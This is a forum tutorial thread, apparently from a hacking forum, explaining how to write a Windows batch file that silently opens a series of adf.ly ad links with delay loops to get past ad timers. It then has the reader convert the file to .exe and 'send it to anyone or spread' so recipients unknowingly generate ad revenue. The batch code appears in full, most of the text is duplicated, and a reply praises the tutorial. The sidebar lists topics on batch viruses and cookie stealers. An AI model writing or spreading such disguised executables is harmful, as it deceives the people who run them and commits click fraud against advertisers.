MAKE OTHERS CLICK YOUR ADF.LY LINKS USING JUST A BATCH FILE!
2 posters
Page 1 of 1
MAKE OTHERS CLICK YOUR ADF.LY LINKS USING JUST A BATCH FILE!
HOW TO MAKE OTHERS CLICK YOUR ADF.LY LINKS USING A BATCH FILE!
Firstly, type these commands in notepad
@echo off makes sure that the commands you write are not visible to anyone who executes it,
start just opens that website in your default browser(like you didn't know that)
now copy paste this command as it is!
what it does that it pauses the batch file for some time, enough to bypass those 5 seconds!
You can even experiment with the time , just change the 10000 in the above command as you wish
again type
and again the waiting command
and continue
till your links are over
at the end type
Now, save your file as anything.bat.
Now, test it!
If it doesn't work check the spaces etc,etc in the above file because it works for me !
now use the batch to exe converter to convert your .bat file to .exe
[You must be registered and logged in to see this link.]
Its a mediafire link!
Sorry for the adf link but even I have the right to earn! right?
[Image: oui.gif]
You can even download it from somewhere else, but should work!
Now send it to anyone or spread
but for sure others do get irritated with this shit!
NOTE:WHILE TESTING THE FILE IF AT ANYTIME YOU WANT TO STOP:
* JUST OPEN THE TASK MANAGER
* END THE PROCESS WHATEVER.EXE
* END THE PROCESS CMD.EXE
YOUR COMMENTS/COMPLAINTS/FEEDBACKS ARE SURELY WELCOME!
Firstly, type these commands in notepad
- Code:
@echo off
start http://yourlink1.com
@echo off makes sure that the commands you write are not visible to anyone who executes it,
start just opens that website in your default browser(like you didn't know that)
now copy paste this command as it is!
- Code:
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% leq 10000 goto pause1
what it does that it pauses the batch file for some time, enough to bypass those 5 seconds!
You can even experiment with the time , just change the 10000 in the above command as you wish
again type
- Code:
start http://yourlink2.com
and again the waiting command
and continue
till your links are over
at the end type
- Code:
exit
Now, save your file as anything.bat.
Now, test it!
If it doesn't work check the spaces etc,etc in the above file because it works for me !
now use the batch to exe converter to convert your .bat file to .exe
[You must be registered and logged in to see this link.]
Its a mediafire link!
Sorry for the adf link but even I have the right to earn! right?
[Image: oui.gif]
You can even download it from somewhere else, but should work!
Now send it to anyone or spread
but for sure others do get irritated with this shit!
NOTE:WHILE TESTING THE FILE IF AT ANYTIME YOU WANT TO STOP:
* JUST OPEN THE TASK MANAGER
* END THE PROCESS WHATEVER.EXE
* END THE PROCESS CMD.EXE
YOUR COMMENTS/COMPLAINTS/FEEDBACKS ARE SURELY WELCOME!
Re: MAKE OTHERS CLICK YOUR ADF.LY LINKS USING JUST A BATCH FILE!
nice tut thanks ...
Crim3R- Posts : 2
Points : 2
Join date : 2012-05-11
Location : 34RTH
Similar topics
» <<::How To Make A Simple Batch Virus::>>
» [TUT] How to make a File/Cookie stealer using PHP! [FUD]
» Hack PC(Get Command Line) without Sending Any File ! :pc:
» AHD Video Converter Ultimate (4.3.2.1.0.1) [withserial- Key File]
» Skype Jar File For Mobile Samsung Wave GT S8500 Free.rar
» [TUT] How to make a File/Cookie stealer using PHP! [FUD]
» Hack PC(Get Command Line) without Sending Any File ! :pc:
» AHD Video Converter Ultimate (4.3.2.1.0.1) [withserial- Key File]
» Skype Jar File For Mobile Samsung Wave GT S8500 Free.rar
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum